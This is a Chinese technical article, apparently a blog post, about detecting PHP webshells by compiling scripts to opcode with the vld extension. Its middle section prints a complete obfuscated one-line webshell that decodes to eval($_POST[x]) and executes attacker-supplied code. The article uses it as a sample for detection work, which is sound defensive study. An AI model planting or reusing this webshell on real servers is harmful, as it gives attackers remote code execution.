opcode在webshell检测中的应用
0x01 什么是opcode
当PHP脚本被Zend Engine解析的时候,Zend Engine会对脚本进行词法、语法分析,然后编译成opcode来执行,类似JVM中的字节码(byte codes),只不过opcode不会像class文件那种存在磁盘,而是在内存中直到PHP的生命周期结束。
我们可以通过PHP扩展vld来查看PHP脚本的opcode,vld项目地址:http://pecl.php.net/package/vld
0x02 读懂opcode
下面我们用vld生成一段opcode看看。PHP脚本如下:
<?php
echo "hello world";
?>我们用vld生成opcode:
php -dvld.active=1 -dvld.execute=0 test.php 
如上为VLD输出的PHP代码生成的中间代码的信息,说明如下:
- Branch analysis from position 这条信息多在分析数组时使用;
- Return found 是否返回,这个基本上有都有;
- filename 分析的文件名;
- function name 函数名,针对每个函数VLD都会生成一段如上的独立的信息,这里显示当前函数的名称;
- number of ops 生成的操作数;
- compiled vars 编译期间的变量,这些变量是在PHP5后添加的,它是一个缓存优化。这样的变量在PHP源码中以IS_CV标记;
这段opcode的意思是echo helloworld 然后return 1。
0x03 opcode在webshell检测中的运用
当检测经过混淆加密后的php webshell的时候,最终还是调用敏感函数,比如eval、system等等。我们可以将其转化为opcode,再检测opcode是否进行了敏感函数调用。举个例子:
<?php
$__C_C="WlhaaGJDZ2tYMUJQVTFSYmVGMHBPdz09";
$__P_P="abcdefghijklmnopqrstuvwxyz";
$__X_X="123456789";
$__O_O=$__X_X[5].$__X_X[3]."_";
$__B_B=$__P_P{1}.$__P_P[0].$__P_P[18].$__P_P[4];
$__H_H=$__B_B.$__O_O.$__P_P[3].$__P_P[4].$__P_P[2].$__P_P[14].$__P_P[3].$__P_P[4];
$__E_E=$__P_P[4].$__P_P[21].$__P_P[0].$__P_P[11];
$__F_F=$__P_P[2].$__P_P[17].$__P_P[4].$__P_P[0].$__P_P[19].$__P_P[4];
$__F_F.='_'.$__P_P[5].$__P_P[20].$__P_P[13].$__P_P[2].$__P_P[19].$__P_P[8].$__P_P[14].$__P_P[13];
$_[00]=$__F_F('$__S_S',$__E_E.'("$__S_S");');
@$_[00]($__H_H($__H_H($__C_C))); //解码后即==> eval($_POST[x]);
?> 上面的php webshell经过解码后就是一句话木马eval($_POST[x]),我们将它转化为opcode:
我们看到,木马文件最终转化成opcode的时候,调用了eval语句“INCLUDE_OR_EVAL”,而这明显是一个危险的操作,很有可能是一个webshell。
0x04 总结
在Webshell检测中,opcode可以: 1、辅助检测PHP后门/Webshell。作为静态分析的辅助手段,可以快速精确定位PHP脚本中可控函数及参数的调用。
2、帮助我们更加深入地理解PHP内核机制,使我们可以修改PHP源码或者以扩展的形式来动态检测PHP后门/Webshell。(HOOK关键危险函数,如eval, assert等,当GPC参数进入危险函数及有相关危险操作时,判定为后门/Webshell)
不过opcpde也有一定的局限性,其部署,维护成本高,消耗内存,对系统资源要求较高。